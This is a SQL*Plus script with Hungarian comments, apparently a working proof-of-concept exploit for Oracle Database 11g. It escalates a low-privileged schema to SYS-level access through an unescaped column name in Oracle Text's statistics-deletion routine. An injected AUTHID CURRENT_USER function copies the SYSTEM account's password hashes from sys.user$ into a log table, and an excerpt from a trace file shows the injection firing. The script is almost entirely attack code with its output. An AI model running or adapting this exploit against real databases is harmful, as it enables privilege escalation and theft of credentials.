-- Adatbázis verziója: Oracle Database 11g Enterprise Edition Release 11.2.0.2.0
-- Megjegyzés: az alábbi kód a 'testing' adatbázisséma alatt fut

-- Megpróbáljuk lekérdezni a sys.user$ táblát, ez a jogosultságok hiánya miatt nem sikerül.
SELECT * FROM sys.user$;
--                *
-- Error at line 1
-- ORA-00942: table or view does not exist

-- Létrehoztunk egy log táblát, amibe az információt gyűjteni fogjuk.
CREATE TABLE log_tbl(creation_date DATE, message VARCHAR2(4000));
-- Table created.

-- Létrehozunk egy függvényt, ami majd az SQL injection során fog lefutni.
-- Nagyon fontos az AUTHID CURRENT_USER rész, hiszen e nélkül a kód a
-- létrehozó jogaival fut (definer rights), így viszont az aktuális felhasználó
-- jogaival fog futni. A függvény maga a példa kedvéért csak annyit csinál, hogy
-- beilleszti a sys.user$ táblából a SYSTEM userhez tartozó sor adatait a log
-- táblánkba.
CREATE OR REPLACE FUNCTION inject RETURN VARCHAR2 AUTHID CURRENT_USER IS
BEGIN
   EXECUTE IMMEDIATE q'!
      BEGIN
         INSERT INTO testing.log_tbl
         SELECT SYSDATE, 'Name: ' || name || ', Password: ' || password || ', Spare: ' || spare4
         FROM sys.user$
         WHERE name = 'SYSTEM';
         COMMIT;
      END;
   !';
   RETURN '''||testing.inject||''';
END;
/
-- Function created.

-- Létrehozzunk egy teszt táblát, aminek az oszlopneve lesz az ahová
-- a kódot beinjektáljuk.
CREATE TABLE test_tbl("'||testing.inject||'" VARCHAR2(4000));
-- Table created.

-- Létrehozunk erre az oszlopra egy Oracle Text indexet.
CREATE INDEX test_idx ON test_tbl("'||testing.inject||'") INDEXTYPE IS CTXSYS.CONTEXT;
-- Index created.

-- Statisztikát gyűjtünk a táblára (lehet elég lenne az oszlopra vagy az indexre is).
EXEC dbms_stats.gather_table_stats(USER, 'test_tbl');
-- PL/SQL procedure successfully completed.

ALTER SESSION SET tracefile_identifier = 'testing';
-- Session altered.

-- Bekapcsoljuk az SQL trace-t
ALTER SESSION SET EVENTS '10046 trace name context forever, level 12';
-- Session altered.

-- Eldobjuk a táblát, ami magával vonja a gyűjtött statisztika törlését is, ami
-- a sebezhetőséget okozza.
DROP TABLE test_tbl;
-- Table dropped.

-- Kikapcsoljuk az SQL trace-t
ALTER SESSION SET EVENTS '10046 trace name context off';
-- Session altered.

-- Megnézzük, hogy van-e kapás. :)
SELECT * FROM log_tbl;
-- (itt elvileg látjuk a SYSTEM userhez tartozó jelszó hash értékeket)

-- Végül a log táblát is eldobjuk.
DROP TABLE log_tbl;
-- Table dropped.

/*

Itt az ide vonatkozó rész a trace fájlból:
a SYS.ODCICOLINFO hívása során az oszlopnevet nem escape-eli, így
a következő rész kerül be: '"'||testing.inject||'"', ami meghívja a
függvényünket.

PARSING IN CURSOR #18446744071448948880 len=284 dep=2 uid=0 oct=47 lid=0 tim=14206188802224 hv=615270705 ad='4bd4b6520' sqlid='1hj4hhwkask9j'
  begin 
    :1 := CTXSYS.TEXTOPTSTATS.ODCISTATSDELETE(SYS.ODCIINDEXINFO('TESTING', 'TEST_IDX', SYS.ODCICOLINFOLIST(sys.ODCICOLINFO('TESTING', 'TEST_TBL', '"'||testing.inject||'"', 'VARCHAR2', NULL, NULL, 0, 0, 0, 0)), NULL, 0, 0, 0, 0), :2, 
      SYS.ODCIENV(0, 3, 0, 17)); 
   end;
END OF STMT

*/